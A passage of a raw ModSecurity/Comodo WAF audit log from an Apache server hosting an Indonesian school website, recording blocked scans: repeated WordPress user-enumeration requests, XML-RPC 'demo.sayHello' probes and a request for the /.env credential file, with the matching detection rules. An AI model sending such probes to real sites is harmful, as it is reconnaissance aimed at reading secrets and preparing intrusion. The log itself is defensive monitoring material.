"ENABLED" --3b772252-Z-- --d91c4017-A-- [10/May/2025:23:07:48 +0700] aB951BLuBiaF9R054QA6rQAAABI 103.236.140.4 60808 103.236.140.4 8181 --d91c4017-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 23.236.181.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 23.236.181.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d91c4017-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d91c4017-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746893268613939 2189 (- - -) Stopwatch2: 1746893268613939 2189; combined=924, p1=328, p2=573, p3=0, p4=0, p5=22, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d91c4017-Z-- --df9a0232-A-- [10/May/2025:23:15:29 +0700] aB97oci6w7GTj2w44Z6C5wAAAMU 103.236.140.4 51600 103.236.140.4 8181 --df9a0232-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --df9a0232-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df9a0232-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746893729332509 2075 (- - -) Stopwatch2: 1746893729332509 2075; combined=1064, p1=347, p2=689, p3=0, p4=0, p5=28, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df9a0232-Z-- --61cf5074-A-- [10/May/2025:23:15:35 +0700] aB97pxLuBiaF9R054QBBuAAAABA 103.236.140.4 51852 103.236.140.4 8181 --61cf5074-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --61cf5074-C-- demo.sayHello --61cf5074-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --61cf5074-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746893735565164 5064 (- - -) Stopwatch2: 1746893735565164 5064; combined=3603, p1=502, p2=2904, p3=29, p4=30, p5=81, sr=54, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61cf5074-Z-- --75406e63-A-- [10/May/2025:23:18:32 +0700] aB98WBLuBiaF9R054QBEaQAAAAg 103.236.140.4 58836 103.236.140.4 8181 --75406e63-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.41.165 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.41.165 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --75406e63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75406e63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746893912369381 857 (- - -) Stopwatch2: 1746893912369381 857; combined=348, p1=302, p2=0, p3=0, p4=0, p5=46, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75406e63-Z-- --81fd1049-A-- [10/May/2025:23:24:06 +0700] aB99phLuBiaF9R054QBJJgAAAAw 103.236.140.4 44746 103.236.140.4 8181 --81fd1049-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.220.202.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.220.202.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --81fd1049-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81fd1049-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746894246964561 3058 (- - -) Stopwatch2: 1746894246964561 3058; combined=1383, p1=438, p2=916, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81fd1049-Z-- --757a5d42-A-- [10/May/2025:23:51:32 +0700] aB-EFNr9PbfRBMhzxmRgxgAAAEE 103.236.140.4 33322 103.236.140.4 8181 --757a5d42-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.81.215.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.81.215.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --757a5d42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --757a5d42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746895892124294 2421 (- - -) Stopwatch2: 1746895892124294 2421; combined=950, p1=314, p2=614, p3=0, p4=0, p5=22, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --757a5d42-Z-- --f405d82c-A-- [11/May/2025:00:30:10 +0700] aB-NIsi6w7GTj2w44Z7VAAAAAMk 103.236.140.4 48374 103.236.140.4 8181 --f405d82c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f405d82c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f405d82c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746898210267758 2952 (- - -) Stopwatch2: 1746898210267758 2952; combined=1687, p1=525, p2=1133, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f405d82c-Z-- --fadc5003-A-- [11/May/2025:00:30:22 +0700] aB-NLtr9PbfRBMhzxmSJ-QAAAEg 103.236.140.4 48928 103.236.140.4 8181 --fadc5003-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fadc5003-C-- demo.sayHello --fadc5003-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fadc5003-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746898222344990 6831 (- - -) Stopwatch2: 1746898222344990 6831; combined=5140, p1=645, p2=4183, p3=104, p4=46, p5=99, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fadc5003-Z-- --0a0dc77c-A-- [11/May/2025:00:30:43 +0700] aB-NQ8i6w7GTj2w44Z7V2QAAAMc 103.236.140.4 49856 103.236.140.4 8181 --0a0dc77c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0a0dc77c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a0dc77c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746898243157508 2012 (- - -) Stopwatch2: 1746898243157508 2012; combined=1021, p1=335, p2=663, p3=0, p4=0, p5=23, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a0dc77c-Z-- --67e99f37-A-- [11/May/2025:00:30:57 +0700] aB-NUci6w7GTj2w44Z7V-gAAANM 103.236.140.4 50446 103.236.140.4 8181 --67e99f37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.123 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --67e99f37-C-- demo.sayHello --67e99f37-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --67e99f37-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746898257288983 22822 (- - -) Stopwatch2: 1746898257288983 22822; combined=11515, p1=635, p2=10592, p3=42, p4=68, p5=104, sr=75, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67e99f37-Z-- --6e66f45c-A-- [11/May/2025:00:31:14 +0700] aB-NYsi6w7GTj2w44Z7WGwAAAMo 103.236.140.4 51202 103.236.140.4 8181 --6e66f45c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6e66f45c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e66f45c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746898274845132 2195 (- - -) Stopwatch2: 1746898274845132 2195; combined=999, p1=339, p2=638, p3=0, p4=0, p5=22, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e66f45c-Z-- --f6c91445-A-- [11/May/2025:00:31:21 +0700] aB-Nadr9PbfRBMhzxmSLVQAAAEY 103.236.140.4 51518 103.236.140.4 8181 --f6c91445-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f6c91445-C-- demo.sayHello --f6c91445-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6c91445-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746898281873756 5499 (- - -) Stopwatch2: 1746898281873756 5499; combined=4183, p1=595, p2=3383, p3=37, p4=49, p5=71, sr=53, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6c91445-Z-- --a652736c-A-- [11/May/2025:00:31:41 +0700] aB-NfauC4AqLGUOyzyUYYgAAAIQ 103.236.140.4 52400 103.236.140.4 8181 --a652736c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a652736c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a652736c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746898301888159 2583 (- - -) Stopwatch2: 1746898301888159 2583; combined=1284, p1=420, p2=832, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a652736c-Z-- --17d29d0a-A-- [11/May/2025:00:31:47 +0700] aB-Ng9r9PbfRBMhzxmSL6gAAAFc 103.236.140.4 52630 103.236.140.4 8181 --17d29d0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17d29d0a-C-- demo.sayHello --17d29d0a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17d29d0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746898307277210 5572 (- - -) Stopwatch2: 1746898307277210 5572; combined=4278, p1=491, p2=3496, p3=59, p4=76, p5=95, sr=51, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17d29d0a-Z-- --23a9b515-A-- [11/May/2025:00:32:56 +0700] aB-NyNr9PbfRBMhzxmSNEAAAAEI 103.236.140.4 55112 103.236.140.4 8181 --23a9b515-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --23a9b515-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23a9b515-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746898376359724 2679 (- - -) Stopwatch2: 1746898376359724 2679; combined=1554, p1=516, p2=1006, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23a9b515-Z-- --1bca851f-A-- [11/May/2025:00:33:02 +0700] aB-Nztr9PbfRBMhzxmSNHQAAAEI 103.236.140.4 55298 103.236.140.4 8181 --1bca851f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1bca851f-C-- demo.sayHello --1bca851f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bca851f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746898382628605 5793 (- - -) Stopwatch2: 1746898382628605 5793; combined=4738, p1=558, p2=3927, p3=40, p4=49, p5=98, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bca851f-Z-- --203ed40b-A-- [11/May/2025:01:17:05 +0700] aB-YIauC4AqLGUOyzyUh6AAAAJI 103.236.140.4 45434 103.236.140.4 8181 --203ed40b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --203ed40b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --203ed40b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746901025764902 4008 (- - -) Stopwatch2: 1746901025764902 4008; combined=2136, p1=637, p2=1464, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --203ed40b-Z-- --3f411b2b-A-- [11/May/2025:01:17:15 +0700] 